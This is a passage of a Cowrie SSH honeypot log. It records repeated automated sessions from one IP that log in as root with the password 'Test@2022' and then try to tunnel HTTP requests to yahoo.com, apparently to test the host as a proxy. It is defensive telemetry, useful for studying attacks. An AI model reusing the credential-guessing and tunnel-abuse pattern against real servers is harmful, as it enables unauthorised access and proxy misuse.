x-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:36.939683Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.175995Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30960,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30960","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.224243Z","session":"3acfd869ccd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.271531Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":7877,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7877","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.409589Z","session":"3acfd869ccd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.457192Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.505226Z","src_ip":"213.209.150.239","session":"3acfd869ccd3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52884,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e55e8abe82","protocol":"ssh","message":"New connection: 213.209.150.239:52884 (1.2.3.4:22) [session: f3e55e8abe82]","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.560646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.561545Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.618857Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.900439Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10695,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10695","sensor":"my-vps","timestamp":"2025-08-26T00:55:37.958321Z","session":"f3e55e8abe82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.015319Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25631,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25631","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.171200Z","session":"f3e55e8abe82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.227785Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.285146Z","src_ip":"213.209.150.239","session":"f3e55e8abe82"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52917,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d1f19916e3e","protocol":"ssh","message":"New connection: 213.209.150.239:52917 (1.2.3.4:22) [session: 7d1f19916e3e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.331511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.332257Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.379544Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.614984Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21303,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21303","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.662961Z","session":"7d1f19916e3e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.710257Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":330,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:330","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.845895Z","session":"7d1f19916e3e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.893125Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.940905Z","src_ip":"213.209.150.239","session":"7d1f19916e3e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52961,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f84a72feed5","protocol":"ssh","message":"New connection: 213.209.150.239:52961 (1.2.3.4:22) [session: 4f84a72feed5]","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.987211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:38.988006Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.035093Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.269641Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4275,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4275","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.318235Z","session":"4f84a72feed5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.365448Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20069,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20069","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.501545Z","session":"4f84a72feed5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.548735Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.596605Z","src_ip":"213.209.150.239","session":"4f84a72feed5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52999,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3b510f11bd","protocol":"ssh","message":"New connection: 213.209.150.239:52999 (1.2.3.4:22) [session: fe3b510f11bd]","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.652214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.652956Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.709775Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:39.992192Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25971,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25971","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.049761Z","session":"fe3b510f11bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.106478Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":9112,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9112","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.263089Z","session":"fe3b510f11bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.319826Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.377163Z","src_ip":"213.209.150.239","session":"fe3b510f11bd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53033,"dst_ip":"1.2.3.4","dst_port":22,"session":"962b97c35c68","protocol":"ssh","message":"New connection: 213.209.150.239:53033 (1.2.3.4:22) [session: 962b97c35c68]","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.423144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.424342Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.471529Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.705101Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":32528,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32528","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.753098Z","session":"962b97c35c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.800676Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
